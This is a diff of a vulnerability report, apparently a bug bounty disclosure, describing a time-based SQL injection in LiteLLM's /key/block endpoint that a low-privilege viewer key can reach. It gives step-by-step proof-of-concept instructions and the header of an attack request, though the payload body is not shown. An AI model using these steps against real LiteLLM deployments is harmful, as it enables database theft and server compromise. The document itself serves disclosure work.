shadia0/Patienc/litellm/SQL_injection.md

 """
 ```

+The proxy_admin can create proxy_admin_viewer accounts via "Invite User," as documented at LiteLLM Documentation.
+According to specifications:

+Proxy Admin: Can create keys, teams, users, add models, etc.

+Proxy Admin Viewer: Can just view spend.
+They cannot create keys, teams or grant users access to new models.

+So the proxy_admin_viewer has limited permissions and cannot be the server's super administrator.

  # Proof of Concept
 1. Login into admin panel with username `admin` and password `sk-1234`.
+2. Create a Proxy Admin Viewer account.
+3. Generate a Proxy Admin Viewer API key.
-2. Send the following POC to the `/key/block`.
+4. Send the following POC to the `/key/block`.
 You can see that it sleeps for 5 seconds.
 This demonstrates the existence of a time-based SQL injection here.
+5. Using this key to perform a delayed SQL injection, the subsequent operations are the same as I initially mentioned, allowing arbitrary database reading and server file access, which can lead to sensitive information leakage and server compromise.
 ```
 POST /key/block HTTP/1.1
 Host: 127.0.0.1:4000
 Content-Length: 115
-Authorization: Bearer sk--OfzCyUwBZt3rpcddaguWw
+Authorization: Bearer sk-5pUqaVXkY6DaR1zEKKnwwA
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
 Content-Type: application/json
 Accept: */*